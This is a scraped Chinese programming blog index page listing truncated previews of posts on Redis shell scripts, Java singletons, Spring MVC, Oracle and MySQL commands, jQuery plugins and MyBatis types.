              如果国内的电子厂商和计算机设备厂商觉得手机市场已经有点饱和了,那么可以考虑一下交换机和路由器市场的进入问题.....        这方面的技术和知识,目前处在一个开放型的状态,有利于各类小型电子企业进入  &nbs
  • 自写简单Redis内存统计shell 商人shang Linux shell统计Redis内存
    #!/bin/bash address="192.168.150.128:6666,192.168.150.128:6666" hosts=(${address//,/ }) sfile="staticts.log" for hostitem in ${hosts[@]} do ipport=(${hostitem
  • 单例模式(饿汉 vs懒汉) oloz 单例模式
    package 单例模式; /* * 应用场景:保证在整个应用之中某个对象的实例只有一个 * 单例模式种的《 懒汉模式》 * */ public class Singleton { //01 将构造方法私有化,外界就无法用new Singleton()的方式获得实例 private Singleton(){}; //02 申明类得唯一实例 priva
  • springMvc json支持 杨白白 json springmvc
    1.Spring mvc处理json需要使用jackson的类库,因此需要先引入jackson包 2在spring mvc中解析输入为json格式的数据:使用@RequestBody来设置输入 @RequestMapping("helloJson") public @ResponseBody JsonTest helloJson() {
  • android播放,掃描添加本地音頻文件 小桔子
            最近幾乎沒有什麽事情,繼續鼓搗我的小東西。想在項目中加入一個簡易的音樂播放器功能,就像華為p6桌面上那麼大小的音樂播放器。用過天天動聽或者QQ音樂播放器的人都知道,可已通過本地掃描添加歌曲。不知道他們是怎麼實現的,我覺得應該掃描設備上的所有文件,過濾出音頻文件,每個文件實例化為一個實體,記錄文件名、路徑、歌手、類型、大小等信息。具體算法思想,
  • oracle常用命令 aichenglong oracledba常用命令
    1 创建临时表空间 create temporary tablespace user_temp  tempfile 'D:\oracle\oradata\Oracle9i\user_temp.dbf' size 50m  autoextend on  next 50m maxsize 20480m  extent management local
  • 25个Eclipse插件 AILIKES eclipse插件
    提高代码质量的插件1. FindBugsFindBugs可以帮你找到Java代码中的bug,它使用Lesser GNU Public License的自由软件许可。2. CheckstyleCheckstyle插件可以集成到Eclipse IDE中去,能确保Java代码遵循标准代码样式。3. ECLemmaECLemma是一款拥有Eclipse Public License许可的免费工具,它提供了
  • Spring MVC拦截器+注解方式实现防止表单重复提交 baalwolf spring mvc
    原理:在新建页面中Session保存token随机码,当保存时验证,通过后删除,当再次点击保存时由于服务器端的Session中已经不存在了,所有无法验证通过。   1.新建注解:   ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
  • 《Javascript高级程序设计(第3版)》闭包理解 bijian1013 JavaScript
    “闭包是指有权访问另一个函数作用域中的变量的函数。”--《Javascript高级程序设计(第3版)》         看以下代码: <script type="text/javascript"> function outer() { var i = 10; return f
  • AngularJS Module类的方法 bijian1013 JavaScriptAngularJSModule
            AngularJS中的Module类负责定义应用如何启动,它还可以通过声明的方式定义应用中的各个片段。我们来看看它是如何实现这些功能的。 一.Main方法在哪里         如果你是从Java或者Python编程语言转过来的,那么你可能很想知道AngularJS里面的main方法在哪里?这个把所
  • [Maven学习笔记七]Maven插件和目标 bit1129 maven插件
    插件(plugin)和目标(goal) Maven,就其本质而言,是一个插件执行框架,Maven的每个目标的执行逻辑都是由插件来完成的,一个插件可以有1个或者几个目标,比如maven-compiler-plugin插件包含compile和testCompile,即maven-compiler-plugin提供了源代码编译和测试源代码编译的两个目标   使用插件和目标使得我们可以干预
  • 【Hadoop八】Yarn的资源调度策略 bit1129 hadoop
    1. Hadoop的三种调度策略 Hadoop提供了3中作业调用的策略, FIFO Scheduler Fair Scheduler Capacity Scheduler 以上三种调度算法,在Hadoop MR1中就引入了,在Yarn中对它们进行了改进和完善.Fair和Capacity Scheduler用于多用户共享的资源调度   2. 多用户资源共享的调度
  • Nginx使用Linux内存加速静态文件访问 ronin47
    Nginx是一个非常出色的静态资源web服务器。如果你嫌它还不够快,可以把放在磁盘中的文件,映射到内存中,减少高并发下的磁盘IO。 先做几个假设。nginx.conf中所配置站点的路径是/home/wwwroot/res,站点所对应文件原始存储路径:/opt/web/res shell脚本非常简单,思路就是拷贝资源文件到内存中,然后在把网站的静态文件链接指向到内存中即可。具体如下:
  • 关于Unity3D中的Shader的知识 brotherlamp unityunity资料unity教程unity视频unity自学
    首先先解释下Unity3D的Shader,Unity里面的Shaders是使用一种叫ShaderLab的语言编写的,它同微软的FX文件或者NVIDIA的CgFX有些类似。传统意义上的vertex shader和pixel shader还是使用标准的Cg/HLSL 编程语言编写的。因此Unity文档里面的Shader,都是指用ShaderLab编写的代码,然后我们来看下Unity3D自带的60多个S
  • CopyOnWriteArrayList vs ArrayList bylijinnan java
    package com.ljn.base; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.concurrent.CopyOnWriteArrayList; /** * 总述: * 1.ArrayListi不是线程安全的,CopyO
  • 内存中栈和堆的区别 chicony 内存
    1、内存分配方面:     堆:一般由程序员分配释放, 若程序员不释放,程序结束时可能由OS回收 。注意它与数据结构中的堆是两回事,分配方式是类似于链表。可能用到的关键字如下:new、malloc、delete、free等等。     栈:由编译器(Compiler)自动分配释放,存放函数的参数值,局部变量的值等。其操作方式类似于数据结构中
  • 回答一位网友对Scala的提问 chenchao051 scalamap
    本来准备在私信里直接回复了,但是发现不太方便,就简要回答在这里。 问题 写道 对于scala的简洁十分佩服,但又觉得比较晦涩,例如一例,Map("a" -> List(11,111)).flatMap(_._2),可否说下最后那个函数做了什么,真正在开发的时候也会如此简洁?谢谢    先回答一点,在实际使用中,Scala毫无疑问就是这么简单。
  • mysql 取每组前几条记录 daizj mysql分组最大值最小值每组三条记录
    一、对分组的记录取前N条记录:例如:取每组的前3条最大的记录 1.用子查询: SELECT * FROM tableName a  WHERE 3> (SELECT COUNT(*) FROM  tableName b WHERE b.id=a.id AND b.cnt>a. cnt) ORDER BY a.id,a.account DE
  • HTTP深入浅出 http请求 dcj3sjt126com http
      HTTP(HyperText Transfer Protocol)是一套计算机通过网络进行通信的规则。计算机专家设计出HTTP,使HTTP客户(如Web浏览器)能够从HTTP服务器(Web服务器)请求信息和服务,HTTP目前协议的版本是1.1.HTTP是一种无状态的协议,无状态是指Web浏览器和Web服务器之间不需要建立持久的连接,这意味着当一个客户端向服务器端发出请求,然后We
  • 判断MySQL记录是否存在方法比较 dcj3sjt126com mysql
    把数据写入到数据库的时,常常会碰到先要检测要插入的记录是否存在,然后决定是否要写入。   我这里总结了判断记录是否存在的常用方法:   sql语句: select   count ( * )  from  tablename;   然后读取count(*)的值判断记录是否存在。对于这种方法性能上有些浪费,我们只是想判断记录记录是否存在,没有必要全部都查出来。
  • 对HTML XML的一点认识 e200702084 htmlxml
    感谢http://www.w3school.com.cn提供的资料 HTML 文档中的每个成分都是一个节点。 节点 根据 DOM,HTML 文档中的每个成分都是一个节点。 DOM 是这样规定的: 整个文档是一个文档节点 每个 HTML 标签是一个元素节点 包含在 HTML 元素中的文本是文本节点 每一个 HTML 属性是一个属性节点 注释属于注释节点 Node 层次
  • jquery分页插件 genaiwei jqueryWeb前端分页插件
    //jquery页码控件// 创建一个闭包    (function($) {      // 插件的定义      $.fn.pageTool = function(options) {        var totalPa
  • Mybatis与Ibatis对照入门于学习 Josh_Persistence mybatisibatis区别联系
    一、为什么使用IBatis/Mybatis         对于从事 Java EE 的开发人员来说,iBatis 是一个再熟悉不过的持久层框架了,在 Hibernate、JPA 这样的一站式对象 / 关系映射(O/R Mapping)解决方案盛行之前,iBaits 基本是持久层框架的不二选择。即使在持久层框架层出不穷的今天,iBatis 凭借着易学易用、
  • C中怎样合理决定使用那种整数类型? 秋风扫落叶 c数据类型
    如果需要大数值(大于32767或小于32767), 使用long 型。 否则, 如果空间很重要 (如有大数组或很多结构), 使用 short 型。 除此之外, 就使用 int 型。 如果严格定义的溢出特征很重要而负值无关紧要, 或者你希望在操作二进制位和字节时避免符号扩展的问题, 请使用对应的无符号类型。 但是, 要注意在表达式中混用有符号和无符号值的情况。    &nbs
  • maven问题 zhb8015 maven问题
      问题1: Eclipse 中 新建maven项目 无法添加src/main/java 问题    eclipse创建maevn web项目,在选择maven_archetype_web原型后,默认只有src/main/resources这个Source Floder。     按照maven目录结构,添加src/main/ja
  • (二)androidpn-server tomcat版源码解析之--push消息处理 spjich javaandrodipn推送
    在 (一)androidpn-server tomcat版源码解析之--项目启动这篇中,已经描述了整个推送服务器的启动过程,并且把握到了消息的入口即XmppIoHandler这个类,今天我将继续往下分析下面的核心代码,主要分为3大块,链接创建,消息的发送,链接关闭。 先贴一段XmppIoHandler的部分代码 /** * Invoked from an I/O proc
  • 用js中的formData类型解决ajax提交表单时文件不能被serialize方法序列化的问题 中华好儿孙 JavaScriptAjaxWeb上传文件FormData
    var formData = new FormData($("#inputFileForm")[0]); $.ajax({ type:'post', url:webRoot+"/electronicContractUrl/webapp/uploadfile", data:formData, async: false, ca
  • mybatis常用jdbcType数据类型 ysj5125094 mybatismapperjdbcType
      MyBatis 通过包含的jdbcType 类型 BIT         FLOAT      CHAR          
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他